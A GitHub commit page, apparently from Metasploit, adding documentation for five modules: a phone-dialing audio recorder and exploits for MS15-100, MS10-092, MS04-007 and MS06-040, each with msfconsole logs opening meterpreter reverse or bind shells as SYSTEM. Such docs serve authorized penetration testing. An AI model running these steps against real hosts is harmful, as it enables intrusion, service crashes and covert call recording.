-
Notifications
You must be signed in to change notification settings - Fork 14.2k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
248 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This module dials a range of phone numbers and records audio from each answered call. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 2. Do: `use modules/auxiliary/scanner/voice/recorder` | ||
| 3. Do: `set IAX_HOST [ip]` | ||
| 4. Do: `set OUTPUT_PATH [path]` | ||
| 5. Do: `set TARGETS [phone numbers]` | ||
| 6. Do: `run` | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| msf > use modules/auxiliary/scanner/voice/recorder | ||
| msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93 | ||
| IAX_HOST => 10.0.183.93 | ||
| msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio | ||
| OUTPUT_PATH => /root/voice | ||
| msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890 | ||
| TARGETS => 123-456-7890 | ||
| msf auxiliary(scanner/voice/recorder) > run | ||
| [*] Dialing 123-456-7890... | ||
| [*] Number: 123-456-7890 ringing Frames 0 DTMF '' | ||
| [*] Number: 123-456-7890 ringing Frames 0 DTMF '' | ||
| [*] Number: 123-456-7890 ringing Frames 0 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 51 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 101 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 151 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 201 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 252 DTMF '' | ||
| [*] Number: 123-456-7890 answered Frames 302 DTMF '' | ||
| [*] Completed Number: 123-456-7890 State: hangup Frames: 302 DTMF '' | ||
| [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw | ||
| [*] Auxiliary module execution completed | ||
| ``` |
54 changes: 54 additions & 0 deletions
54
documentation/modules/exploit/windows/fileformat/ms15_100_mcl_exe.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,54 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe` | ||
| 3. Do: `set FILENAME [filename.mcl]` | ||
| 4. Do: `set FILE_NAME [filename.exe]` | ||
| 5. Do: `set payload [windows/meterpreter/reverse_tcp]` | ||
| 6. Do: `set SRVHOST [IP]` | ||
| 7. Do: `set SRVPORT [number]` | ||
| 8. Do: `exploit` | ||
|
|
||
| ## Options | ||
|
|
||
| ### FILENAME | ||
| The MCL file. | ||
|
|
||
| ### FILE_NAME | ||
| The name of the malicious payload to execute. | ||
|
|
||
| ### FOLDER_NAME | ||
| Share Name (Default: Random). | ||
|
|
||
| ### SRVHOST | ||
| The local host to listen on. This must be an address on the local machine or 0.0.0.0. | ||
|
|
||
| ### SRVPORT | ||
| The local port to listen on. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### A run on Windows Vista (Build 6000) and Kali Linux 2019.3 | ||
|
|
||
| ``` | ||
| msf > use exploit/windows/fileformat/ms15_100_mcl_exe | ||
| msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILENAME file.mcl | ||
| FILENAME => file.mcl | ||
| msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILE_NAME file.exe | ||
| FILE_NAME => file.exe | ||
| msf exploit(windows/fileformat/ms15_100_mcl_exe) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
| PAYLOAD => windows/meterpreter/reverse_tcp | ||
| msf exploit(windows/fileformat/ms15_100_mcl_exe) > set LHOST 192.168.1.3 | ||
| LHOST => 192.168.1.3 | ||
| msf exploit(windows/fileformat/ms15_100_mcl_exe) > exploit | ||
| [*] Server started. | ||
| [*] Malicious executable at \\192.168.1.3\Egoj\file.exe... | ||
| [*] Creating 'file.mcl' file ... | ||
| [+] file.mcl stored at /root/.msf4/local/file.mcl | ||
| [*] Sending stage (180291 bytes) to 192.168.1.2 | ||
| [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:49248) at 2019-11-27 10:11:45 -0700 | ||
| ``` |
51 changes: 51 additions & 0 deletions
51
documentation/modules/exploit/windows/local/ms10_092_schelevator.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,51 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 2. Do: `use modules/exploits/windows/local/ms10_092_schelevator` | ||
| 3. Do: `set SESSION [#]` | ||
| 4. Do: `run` | ||
|
|
||
| ### A run on Windows Vista (Build 6000) and Kali Linux 2019.3 | ||
|
|
||
| ``` | ||
| msf > use modules/exploits/windows/local/ms10_092_schelevator | ||
| msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1 | ||
| SESSION => 1 | ||
| msf5 exploit(windows/local/ms10_092_schelevator) > run | ||
| [*] Started reverse TCP handler on 192.168.1.3:4444 | ||
| [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe | ||
| [*] Creating task: TzAZ6H4K | ||
| [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created. | ||
| [*] SCHELEVATOR | ||
| [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K... | ||
| [*] Original CRC32: 0x69b1db25 | ||
| [*] Final CRC32: 0x69b1db25 | ||
| [*] Writing our modified content back... | ||
| [*] Validating task: TzAZ6H4K | ||
| [*] | ||
| [*] Folder: \ | ||
| [*] TaskName Next Run Time Status | ||
| [*] ========================================== ==================== =============== | ||
| [*] TzAZ6H4K 12/1/2019 10:41:00 A Ready | ||
| [*] SCHELEVATOR | ||
| [*] Disabling the task... | ||
| [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed. | ||
| [*] SCHELEVATOR | ||
| [*] Enabling the task... | ||
| [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed. | ||
| [*] SCHELEVATOR | ||
| [*] Executing the task... | ||
| [*] Sending stage (180291 bytes) to 192.168.1.2 | ||
| [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K". | ||
| [*] SCHELEVATOR | ||
| [*] Deleting the task... | ||
| [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700 | ||
| [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted. | ||
| [*] SCHELEVATOR | ||
| ``` |
59 changes: 59 additions & 0 deletions
59
documentation/modules/exploit/windows/smb/ms04_007_killbill.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,59 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. | ||
|
|
||
| You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. | ||
|
|
||
| This exploit has been successfully tested with the windows/[all]/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary. | ||
|
|
||
| Service Pack 1, Roll Up 1 includes MS04-007. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 2. Do: `use modules/exploits/windows/smb/ms04_007_killbill` | ||
| 3. Do: `set RHOSTS [IP]` | ||
| 4. Do: `set LHOST [IP]` | ||
| 5. Do: `set LPORT [port]` | ||
| 6. Do: `run` | ||
|
|
||
| ## Error messages | ||
|
|
||
| ``` | ||
| The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0) | ||
| ``` | ||
|
|
||
| The system is vulnerable. | ||
|
|
||
| ``` | ||
| The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0) | ||
| ``` | ||
|
|
||
| The system is not vulnerable. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### A run on Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3 | ||
|
|
||
| ``` | ||
| msf > use modules/exploits/windows/smb/ms04_007_killbill | ||
| msf exploit(windows/smb/ms04_007_killbill) > set RHOSTS 192.168.1.2 | ||
| RHOSTS => 192.168.1.2 | ||
| msf exploit(windows/smb/ms04_007_killbill) > run | ||
| [*] Started reverse TCP handler on 192.168.1.3:4444 | ||
| [-] 192.168.1.2:445 - Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0) | ||
| [*] Sending stage (180291 bytes) to 192.168.1.2 | ||
| [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:1050) at 2019-11-27 19:08:46 -0700 | ||
| meterpreter > sysinfo | ||
| Computer : PC-B43791F5F5 | ||
| OS : Windows 2000 (5.0 Build 2195). | ||
| Architecture : x86 | ||
| System Language : en_US | ||
| Domain : WORKGROUP | ||
| Logged On Users : 0 | ||
| Meterpreter : x86/windows | ||
| meterpreter > getuid | ||
| Server username: NT AUTHORITY\SYSTEM | ||
| ``` |
46 changes: 46 additions & 0 deletions
46
documentation/modules/exploit/windows/smb/ms06_040_netapi.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 2. Do: `use modules/exploits/windows/smb/ms06_040_netapi` | ||
| 3. Do: `set RHOSTS [IP]` | ||
| 4. Do: `set PAYLOAD [payload]` | ||
| 5. Do: `set LHOST [IP]` | ||
| 6. Do: `set LPORT [port]` | ||
| 7. Do: `run` | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3 | ||
|
|
||
| ``` | ||
| msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi | ||
| msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2 | ||
| msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp | ||
| msf exploit(windows/smb/ms06_040_netapi) > exploit | ||
| [*] 192.168.1.2:445 - Detected a Windows 2000 target | ||
| [*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ... | ||
| [*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ... | ||
| [*] 192.168.1.2:445 - Building the stub data... | ||
| [*] 192.168.1.2:445 - Calling the vulnerable function... | ||
| [*] Started bind TCP handler against 192.168.1.2:4444 | ||
| [*] Sending stage (180291 bytes) to 192.168.1.2 | ||
| [*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700 | ||
| meterpreter > sysinfo | ||
| Computer : PC-B43791F5F5 | ||
| OS : Windows 2000 (5.0 Build 2195). | ||
| Architecture : x86 | ||
| System Language : en_US | ||
| Domain : WORKGROUP | ||
| Logged On Users : 1 | ||
| Meterpreter : x86/windows | ||
| meterpreter > getuid | ||
| Server username: NT AUTHORITY\SYSTEM | ||
| ``` |